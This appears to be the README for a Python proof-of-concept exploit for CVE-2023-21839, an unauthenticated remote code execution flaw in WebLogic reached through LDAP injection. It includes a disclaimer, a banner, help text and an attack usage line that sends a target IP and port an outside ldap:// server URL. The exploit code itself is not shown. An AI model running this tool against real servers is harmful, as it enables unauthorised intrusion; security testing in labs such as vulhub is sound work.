
Exploit de prueba de concepto en Python para CVE-2023-21839 dirigido a servidores WebLogic mediante inyección LDAP para ejecución remota de código no autenticada.
Traducido de la versión Go del gran @4ra1n a Python según necesidades especiales. ¡Gracias de nuevo!
Este programa debe ser utilizado únicamente para fines autorizados de pruebas de seguridad e investigación. Los usuarios deben cumplir con la Ley de Seguridad Cibernética.
El autor no se hace responsable de ningún uso ilegal, como ataques no autorizados, que los usuarios realicen con esta herramienta.
Reproducir con vulhub: enlace
___ __ ____ ___ ____ _____ ____ _ ___ _____ ___
/ __\/\ /\/__\ |___ \ / _ \___ \|___ / |___ \/ |( _ )___ // _ \
/ / \ \ / /_\_____ __) | | | |__) | |_ \ _____ __) | |/ _ \ |_ \ (_) |
/ /___ \ \ V //_|_____/ __/| |_| / __/ ___) |_____/ __/| | (_) |__) \__, |
\____/ \_/\__/ |_____|\___/_____|____/ |_____|_|\___/____/ /_/
usage: CVE-2023-21839.py [-h] [-ip] [-p] [-l]
Please enter parameters
optional arguments:
-h, --help show this help message and exit
-ip , --ip target ip
-p , --port target port
-l , --ldap ldap
python3 CVE-2023-21839.py -ip xx -p xx -l ldap://xx
